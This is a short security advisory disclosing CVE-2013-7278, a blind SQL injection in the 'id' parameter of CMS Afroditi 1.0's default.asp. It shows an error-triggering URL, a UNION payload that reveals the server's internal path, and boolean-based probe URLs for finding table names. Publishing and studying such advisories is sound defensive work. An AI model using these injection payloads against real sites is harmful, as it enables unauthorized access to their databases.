CVE-2013-7278 – CMS Afroditi 1.0 Blind SQL Injection

About the software

CMS Afroditi is a content management system, powerful and user-friendly, mainly aimed at small businesses and but also appropriate for firms and organisations of all sizes who are in need for a very flexible yet
simple system to manage their website. The CMS is written in ASP and it’s using the Microsoft JET Database (Access).

Vulnerability Details

projectzero labs identified a blind sql injection vulnerability in the “id” variable.

Example

The following URL can be used to trigger an SQL injection vulnerability in the “default.asp” web page:

http://site.tld/default.asp?id=0'

The error output confirming the SQL injection vulnerability:

##################################################################
Microsoft JET Database Engine error '80040e14'

Syntax error (missing operator) in query expression 'id = 0'''.

/default.asp, line 104
##################################################################

 

Exploitation & PoC

An attacker must brute force all the names for table and column used by the website in order to extract data from MS Access database.

Internal path disclosure

http://site.tld/default.asp?id=1 union select 1 from random.randomtable

The internal path can be discovered through this error output:

##################################################################
Microsoft JET Database Engine error '80004005'

Could not find file 'c:\windows\system32\inetsrv\random.mdb'.

/default.asp, line 104
##################################################################

 

Example for the table names extraction


WHITE PAGE -=> TABLE FOUND!
http://site.tld/default.asp?id=25 and 0<=(SELECT count(*) FROM [site]) and 1=1 
ERROR -=> TABLE NOT FOUND!
http://site.tld/default.asp?id=25 and 0<=(SELECT count(*) FROM [notatable]) and 1=1

Severity

High

Author

Filippos Mastrogiannis

External Links

CVE
NVD
≈ Packet Storm

Comments are closed.